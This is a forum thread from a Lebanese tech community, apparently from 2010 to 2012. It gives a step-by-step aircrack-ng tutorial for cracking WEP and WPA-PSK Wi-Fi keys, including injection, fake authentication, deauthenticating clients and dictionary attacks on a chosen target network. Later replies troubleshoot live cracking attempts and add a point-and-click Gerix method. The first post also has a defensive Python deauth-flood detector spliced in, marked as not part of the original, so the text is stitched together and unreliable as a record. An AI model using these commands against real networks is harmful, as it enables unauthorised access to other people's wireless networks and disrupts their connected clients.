LebGeeks

A community for technology geeks in Lebanon.


#1 December 6 2010

m0ei
Member

WEP and WPA pass cracking! Full Tutorial.

This tutorial is for educational purpose and I'm not responsible for any misuse of the aircrack-ng tool.

Here's a WEP and WPA cracking tutorial.

Wep Cracking Tutorial:

First of all you need the Backtrack Live CD (ISO or VMware image), which can be downloaded from:
http://www.backtrack-linux.org/downloads/
Or a Linux distro with Aircrack-ng installed (it can be cracked with other tools, but this tut is for aircrack).
And the most important thing is that YOU NEED TO HAVE A WIRELESS CARD that SUPPORTS INJECTION.

Description:

Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the all-new PTW attack, thus making the attack much faster compared to other WEP cracking tools.

In fact, Aircrack-ng is a set of tools for auditing wireless networks.

Tutorial: How to crack WEP with no wireless clients (it will also work with clients; it works for both).

1) To know which interface your wireless card is using, for example wlan0 or mon0 or ath0 ......., type:

iwconfig

My interface will be "wlan0".


2) To set your wireless card to monitor mode, type:

airmon-ng start wlan0

2) To know whether your wireless card supports injection or not, open a shell and type:

aireplay-ng -9 wlan0

or

aireplay-ng --test wlan0

3) To list all the wireless networks around your wireless card:

airodump-ng wlan0

and it will show you all the wireless names (ESSID), MAC addresses (BSSID), channels .......


4) To know your wireless card's MAC address, type:

macchanger -s wlan0

5) After you choose your TARGET, type:

airodump-ng --bssid (Mac address) -c (channel number) -w (any name) wlan0

Keep this shell open and open another one to type the other commands.


6) Use aireplay-ng to do a fake authentication with the access point.

This is a very important step.

In order for an access point to accept a packet, the source MAC address must already be associated. If the source MAC address you are injecting is not associated then the AP ignores the packet and sends out a “DeAuthentication” packet. In this state, no new IVs are created because the AP is ignoring all the injected packets.

The lack of association with the access point is the single biggest reason why injection fails.

To associate with an access point, use fake authentication.

Type:

aireplay-ng -1 0 -e (Target wireless name or ESSID) -a (Target Mac address or BSSID) -h (your wireless card mac address) wlan0

-e is optional.


7)

The objective of the chopchop and fragmentation attacks is to obtain a PRGA (pseudo random generation algorithm) file. This PRGA is not the WEP key and cannot be used to decrypt packets. However, it can be used to create new packets for injection. The creation of new packets will be covered later in the tutorial.

Here you can use 2 types of attacks: either the ChopChop (-4) or the Fragmentation (-5) attack.

aireplay-ng -5 -b (target Mac address or BSSID) -h (your wireless card mac address) wlan0

I prefer Fragmentation, but if Fragmentation didn't work, you can always try the ChopChop attack.

aireplay-ng -4 -b (target Mac address or BSSID) -h (your wireless card mac address) wlan0

When a packet from the access point arrives, enter “y” to proceed. You may need to try a few to be successful.

If successful, you will get:
"Success! The file “fragment-01234-42132148.xor”= "example.xor" can then be used in the next step to generate an arp packet. "

8) In the previous step, we obtained PRGA. It does not matter which attack generated the PRGA, both are equal. This PRGA is stored in the files ending with “xor”. We can then use this PRGA to generate a packet for injection. We will be generating an arp packet for injection. The objective is to have the access point rebroadcast the injected arp packet. When it rebroadcasts it, a new IV is obtained. All these new IVs will ultimately be used to crack the WEP key.

packetforge-ng -0 -a (Target mac address or BSSID) -h (your wireless card mac address) -k 255.255.255.255 -l 255.255.255.255 -y (.xor you received in the last step) -w (any name)

9) Now to inject the arp packet, enter:

aireplay-ng -2 -r (name in -w in packetforge) wlan0

or

aireplay-ng -3 -r (name in -w in packetforge) -b (target mac address) -h (your wireless card mac address) wlan0

10) LAST STEP:

aircrack-ng (name in -w from airodump step 5)-01.cap

If you used step 5) more than once with the same name in -w, check the desktop.
For example, if you used -w lebgeeks in step 2 and then used the same name again, your last step will be lebgeeks-02.cap.



=================================================
Cracking WPA:

WPA/WPA2 supports many types of authentication beyond pre-shared keys. aircrack-ng can ONLY crack pre-shared keys. So make sure airodump-ng shows the network as having the authentication type of PSK, otherwise, don't bother trying to crack it.

The only time you can crack the pre-shared key is if it is a dictionary word or relatively short in length. Conversely, if you want to have an unbreakable wireless network at home, use WPA/WPA2 and a 63 character password composed of random characters including special symbols.

There is another important difference between cracking WPA/WPA2 and WEP. This is the approach used to crack the WPA/WPA2 pre-shared key. Unlike WEP, where statistical methods can be used to speed up the cracking process, only plain brute force techniques can be used against WPA/WPA2. That is because the key is not static, so collecting IVs, as when cracking WEP encryption, does not speed up the attack. The only thing that does give the information to start an attack is the handshake between client and AP. Handshaking is done when the client connects to the network. Although not absolutely true, for the purposes of this tutorial, consider it true. Since the pre-shared key can be from 8 to 63 characters in length, it effectively becomes impossible to crack the pre-shared key.
IMPORTANT: This means that the passphrase must be contained in the dictionary you are using to break WPA/WPA2. If it is not in the dictionary then aircrack-ng will be unable to determine the key.

Before we start, there is no difference between cracking WPA or WPA2 networks. The authentication methodology is basically the same between them. So the techniques you use are identical.

1) Start airodump-ng to collect the authentication handshake.
The purpose of this step is to run airodump-ng to capture the 4-way authentication handshake for the AP we are interested in.
Beware: YOU CAN'T CRACK WPA WITHOUT GETTING A 4-WAY AUTHENTICATION HANDSHAKE.

Follow the same steps as in WEP up to STEP 4, then type:

airodump-ng -c (target channel) --bssid (target mac address or BSSID) -w (any name) wlan0

CH  9 ][ Elapsed: 4 s ][ 20010-12-6 16:30 ][ WPA handshake: 00:14:6C:7E:40:80
In the line above, notice the “WPA handshake: 00:14:6C:7E:40:80” in the top right-hand corner. This means airodump-ng has successfully captured the four-way handshake.


2) Use aireplay-ng to deauthenticate the wireless client.

"This step is optional. If you are patient, you can wait until airodump-ng captures a handshake when one or more clients connect to the AP. You only perform this step if you opted to actively speed up the process. The other constraint is that there must be a wireless client currently associated with the AP. If there is no wireless client currently associated with the AP, then you have to be patient and wait for one to connect to the AP so that a handshake can be captured. Needless to say, if a wireless client shows up later and airodump-ng did not capture the handshake, you can backtrack and perform this step.

This step sends a message to the wireless client saying that it is no longer associated with the AP. The wireless client will then hopefully reauthenticate with the AP. The reauthentication is what generates the 4-way authentication handshake we are interested in collecting. This is what we use to break the WPA/WPA2 pre-shared key."

Based on the output of airodump-ng in the previous step, you determine a client which is currently connected. You need its MAC address for the following.

Open a new shell and type the following:

aireplay-ng -0 1 -a (target mac address) -c (your wireless card mac address) wlan0

To know if it's working or not, check the output:

16:30:28  Sending DeAuth to station   -- STMAC: [00:0F:B5:34:30:30]

Tip: "The deauthentication packets are sent directly from your PC to the clients. So you must be physically close enough to the clients for your wireless card transmissions to reach them. To confirm the client received the deauthentication packets, use tcpdump or similar to look for ACK packets back from the client. If you did not get an ACK packet back, then the client did not “hear” the deauthentication packet."

3) Run aircrack-ng to crack the pre-shared key.

aircrack-ng -w (any wordlist .lst ...) -b (Target mac address) (name in -w in airodump-ng)-01.cap

If you get this error: "No valid WPA handshakes found", that means you didn't get any handshake.


Anyway, I won't waste my time with WPA cracking, because Lebanese people most of the time use their phone numbers or strange names as password, so it's difficult to crack.
WPA cracking could be done by bruteforcing, but imagine how much time it needs to be done?
Check this site to calculate the bruteforcing speed to crack a pass: http://lastbit.com/pswcalc.asp


Hope you enjoy it.
Will post some tutorials from time to time.

Last edited by m0ei (December 8 2010)
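The deauthentication step above (WPA step 2, "aireplay-ng -0") and the deauth pauses seen later in the thread both leave a footprint a wireless IDS can catch. The following is an added example, not part of the original post or of aircrack-ng: it parses raw 802.11 management-frame headers from constructed sample frames and flags a burst of deauth/disassoc frames per (BSSID, source) pair. The frame builder, the 10-frames-in-5-seconds threshold and the use of the MAC addresses from the post's own output lines are assumptions.

```python
"""Rate-based detector for 802.11 deauthentication floods (added example).

Parses raw management-frame headers (constructed here, no capture file)
and alerts once a (BSSID, source) pair exceeds a deauth/disassoc rate.
"""
from collections import defaultdict, deque
import struct

DEAUTH_SUBTYPE = 0xC    # management subtype 12
DISASSOC_SUBTYPE = 0xA  # management subtype 10


def parse_mgmt_frame(frame: bytes):
    """Return (subtype, addr1, addr2, addr3, reason) or None if not management."""
    if len(frame) < 24:                      # 24-byte management header
        return None
    fc0 = frame[0]
    if (fc0 >> 2) & 0x3 != 0:                # frame type 0 = management
        return None
    subtype = (fc0 >> 4) & 0xF

    def mac(b):
        return ':'.join(f'{x:02x}' for x in b)

    addr1, addr2, addr3 = mac(frame[4:10]), mac(frame[10:16]), mac(frame[16:22])
    reason = None
    if subtype in (DEAUTH_SUBTYPE, DISASSOC_SUBTYPE) and len(frame) >= 26:
        reason = struct.unpack('<H', frame[24:26])[0]   # body = reason code
    return subtype, addr1, addr2, addr3, reason


class DeauthFloodDetector:
    """Sliding-window counter; alerts the first time the threshold is reached."""

    def __init__(self, threshold=10, window_s=5.0):
        self.threshold, self.window_s = threshold, window_s
        self.history = defaultdict(deque)    # (bssid, src) -> timestamps
        self.alerts = []

    def feed(self, ts: float, frame: bytes):
        parsed = parse_mgmt_frame(frame)
        if parsed is None or parsed[0] not in (DEAUTH_SUBTYPE, DISASSOC_SUBTYPE):
            return None
        subtype, addr1, addr2, addr3, reason = parsed
        q = self.history[(addr3, addr2)]
        q.append(ts)
        while q and ts - q[0] > self.window_s:   # drop entries outside window
            q.popleft()
        if len(q) == self.threshold:             # alert once per crossing
            alert = {'bssid': addr3, 'source': addr2, 'target': addr1,
                     'count': len(q), 'reason': reason}
            self.alerts.append(alert)
            return alert
        return None


def build_frame(subtype, dst, src, bssid, reason=None, seq=0):
    """Constructed management frame: FC, duration, addr1-3, seq ctl, body."""
    fc = bytes([subtype << 4, 0x00])
    frame = fc + b'\x00\x00' + dst + src + bssid + struct.pack('<H', seq << 4)
    return frame + (struct.pack('<H', reason) if reason is not None else b'')


def run_demo():
    ap = bytes.fromhex('00146c7e4080')   # BSSID from the post's airodump line
    sta = bytes.fromhex('000fb5343030')  # STMAC from the post's aireplay output
    det = DeauthFloodDetector(threshold=10, window_s=5.0)
    det.feed(0.0, build_frame(0x8, b'\xff' * 6, ap, ap))                  # beacon: ignored
    det.feed(0.0, build_frame(DEAUTH_SUBTYPE, sta, ap, ap, reason=3))      # one legit deauth
    for i in range(12):                                                    # spoofed burst
        det.feed(60.0 + i * 0.08, build_frame(DEAUTH_SUBTYPE, sta, ap, ap, reason=7, seq=i))
    return det


if __name__ == '__main__':
    for a in run_demo().alerts:
        print('deauth flood:', a)
```

A client that merely flaps will not trip the single-deauth case; only sustained bursts from one source against one BSSID do.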


#2 December 6 2010

Ayman
Member

Re: WEP and WPA pass cracking! Full Tutorial.

Very nice and detailed tutorial, thank you very much for the information, keep up the good work :)


#3 December 6 2010

amkahal
Member

Re: WEP and WPA pass cracking! Full Tutorial.

From my experience, the signal strength is very critical, and you have to spend a lot of time collecting packets.
In other words, in some situations the operation is nearly impossible.


#4 December 6 2010

Bij
Member

Re: WEP and WPA pass cracking! Full Tutorial.

After my experience with many types of test attacks, I can easily say that when it comes to WEP, one of the best manual ways to speed up IV capture (if other automatic processes fail) is to continually log in and out or attempt to log in. I had some issues with faking authentication before and was too lazy to solve them.

Last edited by Bij (December 6 2010)


#5 December 6 2010

m0ei
Member

Re: WEP and WPA pass cracking! Full Tutorial.

amkahal wrote:

From my experience, the signal strength is very critical, and you have to spend a lot of time collecting packets.
In other words, in some situations the operation is nearly impossible.

Of course the signal strength is very critical, but if you have a powerful wireless card this won't be that important.
I rarely have problems with signal strength; max 5 min = pass cracked.

Currently I use http://www.wifly-city.com.tw/en/cp/html/?75.html and I think it's great, it has a very good range.


#6 December 7 2010

bigjudge
Member

Re: WEP and WPA pass cracking! Full Tutorial.

Hi m0ei

Is this for Linux-based OSes only? Does it work for Windows? If not, do you have any tutorial that works with Windows, like Vista for example?

Thanks.


#7 December 7 2010

Georges
Member

Re: WEP and WPA pass cracking! Full Tutorial.

Hello m0ei,

Thanks for the detailed information about this topic. But I have one simple note here, regarding what you mentioned first about a VMware image.

Is it plausible to directly attack a wireless network through VMware? Since VMware virtualises the network adapter to allow the guest OS to connect to the internet using the host's connection.

I'd love to see one day a cross-platform application with one single button: Connect To The Internet.
All the hard work should be done in the background... Users should not write a single command.


#8 December 8 2010

Bij
Member

Re: WEP and WPA pass cracking! Full Tutorial.

Georges Raad wrote:

I'd love to see one day a cross-platform application with one single button: Connect To The Internet.
All the hard work should be done in the background... Users should not write a single command.

These applications do exist, but as you will see here:
http://www.engadget.com/2010/09/25/elco … ing-syste/
they cost a lot of money compared to the free solution of copying some terminal commands on a LiveCD boot of a Linux distro, plus the tons of other free tools for basic and advanced offensive and defensive security.


#9 December 8 2010

xterm
Moderator

Re: WEP and WPA pass cracking! Full Tutorial.

Very nice, thank you. I love your first line.


#10 December 8 2010

Bij
Member

Re: WEP and WPA pass cracking! Full Tutorial.

Were you talking to me, xterm?


#11 December 8 2010

m0ei
Member

Re: WEP and WPA pass cracking! Full Tutorial.

Georges Raad wrote:

Hello m0ei,

Thanks for the detailed information about this topic. But I have one simple note here, regarding what you mentioned first about a VMware image.

Is it plausible to directly attack a wireless network through VMware? Since VMware virtualises the network adapter to allow the guest OS to connect to the internet using the host's connection.

I'd love to see one day a cross-platform application with one single button: Connect To The Internet.
All the hard work should be done in the background... Users should not write a single command.

You're welcome. Yes, it will work normally with VMware, but first, if the wireless card is not connected to VMware, you will have to connect it.

Oh, forgot to mention: it will only work with an "EXTERNAL WIRELESS CARD" on VMware.
Your built-in wireless card (if it supports injection) will work only if you boot the LiveCD via USB or DVD.

Last edited by m0ei (December 8 2010)


#12 January 3 2011

dan961
Member

Re: WEP and WPA pass cracking! Full Tutorial.

Do I have to download Backtrack on Ubuntu? (sorry, I'm new to Linux)


#13 January 3 2011

m0ei
Member

Re: WEP and WPA pass cracking! Full Tutorial.

dan961 wrote:

Do I have to download Backtrack on Ubuntu? (sorry, I'm new to Linux)

Backtrack is an OS just like Ubuntu. You can't install an OS inside another one. You can dual boot, but that has nothing to do with your problem.
The tool here is Aircrack-ng, and the OS that I'm using is Backtrack.
You can download the Backtrack Live CD, or the Backtrack VMware image. Like 1.5-2 GB, I think.

Last edited by m0ei (January 3 2011)


#14 January 3 2011

Joe
Member

Re: WEP and WPA pass cracking! Full Tutorial.

Or you can simply install aircrack-ng on Ubuntu and use it.

Backtrack and Ubuntu have a lot in common. Actually over 50% of the code they run is the same. They simply come with different pre-installed programs, and some differences in configurations.

I'm sure that if you don't feel like downloading such a large file you could ask around on the forum and people would give you a copy of Backtrack.


#15 January 3 2011

dan961
Member

Re: WEP and WPA pass cracking! Full Tutorial.

Thanks man, I already finished downloading Backtrack 4 R2 :)


#16 January 5 2011

Jingles
Banned

Re: WEP and WPA pass cracking! Full Tutorial.

ur sneaky little... where do u find all of this info


#17 January 5 2011

m0ei
Member

Re: WEP and WPA pass cracking! Full Tutorial.

Jingles wrote:

ur sneaky little... where do u find all of this info

Found this? lol
I wrote it. Plus I'm studying information security: penetration/hacking/exploiting and other topics.


#18 January 8 2011

tufi2
Member

Re: WEP and WPA pass cracking! Full Tutorial.

I use aircrack on the SliTaz live distribution: it's a small Linux distribution (about 35 MB) made especially for aircrack-ng, with all the drivers you need patched for injection. You can download the ISO from here http://aircrack-ng.org/doku.php?id=slitaz and copy it to a CD or something, then boot it without the need to install anything to the hard disk.


#19 January 8 2011

eurybaric
Member

Re: WEP and WPA pass cracking! Full Tutorial.

@m0ei, do you have any idea if/where I could get this external wifi card in Lebanon?

Edit: the one you're using, I mean.

Last edited by eurybaric (January 8 2011)


#20 January 12 2011

dan961
Member

Re: WEP and WPA pass cracking! Full Tutorial.

Trying to crack my WEP key, but I'm getting "Failed. Next try with 5000 IVs" in the last step (10)!


#21 January 12 2011

m0ei
Member

Re: WEP and WPA pass cracking! Full Tutorial.

You need to wait till you get more IVs.
Wait till it gets to 30-40k IVs and then try the last step.

Last edited by m0ei (January 12 2011)


#22 August 9 2012

F0u4d
Member

Re: WEP and WPA pass cracking! Full Tutorial.

Hello,

It's actually a nice tutorial. I have been working on getting it to work for a month with no luck!
I have a question: sometimes when doing "aireplay-ng -4 -b 00:26:44:26:D7:DF -h 00:25:86:e7:40:7c wlan1" or "aireplay-ng -1 0 -a 00:26:44:26:D7:DF -h 00:25:86:e7:40:7c wlan1" it says wrong channel, so I keep doing it till it goes to the right channel. Is this normal? Or does it affect the process in any way?

And I have a problem on step 8; I'm getting:

root@bt:~# aireplay-ng -4 -b 00:26:44:26:D7:DF -h 00:25:86:e7:40:7c wlan1
20:35:27  Waiting for beacon frame (BSSID: 00:26:44:26:D7:DF) on channel 6
Read 1598 packets...

        Size: 68, FromDS: 1, ToDS: 0 (WEP)

              BSSID  =  00:26:44:26:D7:DF
          Dest. MAC  =  FF:FF:FF:FF:FF:FF
         Source MAC  =  00:26:44:26:D7:DE

        0x0000:  0862 0000 ffff ffff ffff 0026 4426 d7df  .b.........&D&..
        0x0010:  0026 4426 d7de 2053 1f4f 8d00 a3e4 278f  .&D&.. S.O....'.
        0x0020:  f4b2 cbc5 54f8 66f1 5f35 e5db c0f7 4c86  ....T.f._5....L.
        0x0030:  1b3d 3c91 a20c d405 c0ba 8131 30f3 4201  .=<........10.B.
        0x0040:  7810 7e8c                                x.~.

Use this packet ? y

Read 1608 packets...

        Size: 68, FromDS: 1, ToDS: 0 (WEP)

              BSSID  =  00:26:44:26:D7:DF
          Dest. MAC  =  FF:FF:FF:FF:FF:FF
         Source MAC  =  00:26:44:26:D7:DE

        0x0000:  0842 0000 ffff ffff ffff 0026 4426 d7df  .B.........&D&..
        0x0010:  0026 4426 d7de 5053 224f 8d00 3b8b bec5  .&D&..PS"O..;...
        0x0020:  cc1d b5b5 e914 c6b1 8524 c31f 1437 1543  .........$...7.C
        0x0030:  ee56 00e8 3582 c217 9884 ddab 81f0 5c33  .V..5.........\3
        0x0040:  63ad 215a                                c.!Z

Use this packet ? y

Saving chosen packet in replay_src-0809-203819.cap

got several deauthentication packets - pausing 3 seconds for reconnection
got several deauthentication packets - pausing 3 seconds for reconnection
got several deauthentication packets - pausing 3 seconds for reconnection
got several deauthentication packets - pausing 3 seconds for reconnection
Sent 7379 packets, current guess: B6...

The chopchop attack appears to have failed. Possible reasons:



Why is it failing after 2 successes? (It happened twice before after 1 successful packet.) Can it be because of low signal or something? It's a WEP wifi network.
And where can I find this "(.xor you received in the last step)"? Do I have to write Y many times till I get this?

Sorry if I'm annoying, thought it would be the best place to get help from, my country's peeps.

Thanks in advance

Last edited by F0u4d (August 9 2012)


#23 August 10 2012

Roudykh
Member

Re: WEP and WPA pass cracking! Full Tutorial.

@F0u4d, try the fragmentation attack; it could be a low signal.
Do you have BT5?
There is an easier method without a single command. Begin with this, then try m0ei's method.

1- Run gerix-wifi-cracker-ng (it's pre-installed on BT5); it's under exploitation tools > wireless exploitation > wlan exploitation.
2- Go to the configuration tab. Click on your interface, then on enable/disable monitor mode. A new interface will open.
3- Click on the new interface and set a random MAC address.
4- Select all channels and click rescan.
5- Highlight the network you want to crack the password of.
6- Go to the WEP tab and click start sniffing and logging.
7- Since chopchop didn't work for you, I'll use the fragmentation attack. Click on associate with fake AP using fake auth. After you click it, OPN will appear in the terminal opened before.
8- Click on fragmentation attack, then type y in the terminal.
9- Click create the ARP packet to be injected on the victim access point.
10- Now inject it by clicking on inject the created packet. Wait until it reaches about 15000 and stop it.
11- Go to the cracking tab and click on aircrack-ng decrypt WEP password.
A new terminal will open.
Key Found!
Key Found!

If you have further questions, install my Android app; download it from this link (it's not published on the Play Store):
http://sdrv.ms/LHSOkc


#24 August 10 2012

supra
Member

Re: WEP and WPA pass cracking! Full Tutorial.

I have a question, sometimes when doing "aireplay-ng -4 -b 00:26:44:26:D7:DF -h 00:25:86:e7:40:7c wlan1" or "aireplay-ng -1 0 -a 00:26:44:26:D7:DF -h 00:25:86:e7:40:7c wlan1" it says wrong channel so i keep doing it till it goes in the right channel is this normal? or does it affect the process in any way?

I think your problem is that you are not using aireplay-ng on the right channel, because the channel changes sometimes. One way to know is to open a new terminal window and use airodump-ng to see all the networks, so you can find your victim's new channel, and then retry aireplay-ng with the channel you found.

Last edited by supra (August 10 2012)


#25 August 10 2012

F0u4d
Member

Re: WEP and WPA pass cracking! Full Tutorial.

Hello Roudy,

Thanks for this awesome method with a great tutorial! Much appreciated!

Even though I had some problems with deauthentication after clicking Y on 1 packet to use, I managed to make it work and get "saving keystream in .... .xor" with different wifi networks.

After that I did the next step and got:

"Saving choosen packet to in replay.... .cap"
"You should also start airpdump to capture replies."

"End of file."

So after that I went to the last step in the cracking tab and clicked on "aircrack-ng - Decrypt WEP Password".
It opens a terminal and starts testing keys, then it stops and nothing happens, and I don't get "Key Found!" (I closed the terminal and clicked it again and the same thing happened, but with a different number of tested keys and IVs.)

Please take a look on my screenshots!


So I guess I'm stuck at the last step. Any idea why this is happening?

Thanks..

